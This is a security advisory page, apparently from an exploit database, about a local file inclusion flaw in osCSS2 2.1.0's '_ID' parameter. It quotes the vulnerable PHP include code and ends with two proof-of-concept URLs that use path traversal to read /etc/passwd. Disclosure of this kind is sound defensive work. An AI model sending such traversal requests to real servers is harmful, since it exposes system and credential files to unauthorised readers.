header-logo
Suggest Exploit
vendor:
oscss2
by:
Stefan Schurtz
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: oscss2
Affected Version From: 2.1.2000
Affected Version To: 2.1.2000
Patch Exists: YES
Related CWE: N/A
CPE: a:oscss:oscss2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

osCSS2 “_ID” parameter Local file inclusion

osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability. The vulnerable code is present in the .htaccess, content.php and page.php files. The PoC-Exploit involves sending a malicious request to the target server with the _ID parameter set to a malicious file path. This can be used to read sensitive files from the server.

Mitigation:

Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
Source

Exploit-DB raw data:

Advisory:              		osCSS2 "_ID" parameter Local file inclusion
Advisory ID:           	SSCHADV2011-034
Author:                		Stefan Schurtz
Affected Software:  	Successfully tested on osCSS2 2.1.0 (latest version)
Vendor URL:          	http://oscss.org/
Vendor Status:       	Fixed in svn branche 2.1.0 and reported in develop version 2.1.1

==========================
Vulnerability Description
==========================

osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability

==========================
Vulnerable code
==========================

//.htaccess
RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}

//content.php
require($page->path_gabarit());

// includes/classes/page.php
public function pile_file_lang($path_file){
    global $lang;
    if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;

if(!in_array($path_file,(array)$this->PileFileLang))
      include_once($path_file);
}

==================
PoC-Exploit
==================

http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd

=========
Solution
=========

Fixed in svn branche 2.1.0 and reported in develop version 2.1.1

====================
Disclosure Timeline
====================

08-Nov-2011 - informed vendor
08-Nov-2011 – release date of this security advisory

========
Credits
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References
===========

http://oscss.org/
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
http://dev.oscss.org/task/892
http://www.rul3z.de/advisories/SSCHADV2011-034.txt

Navigation

Suggest Exploit

Services By CQR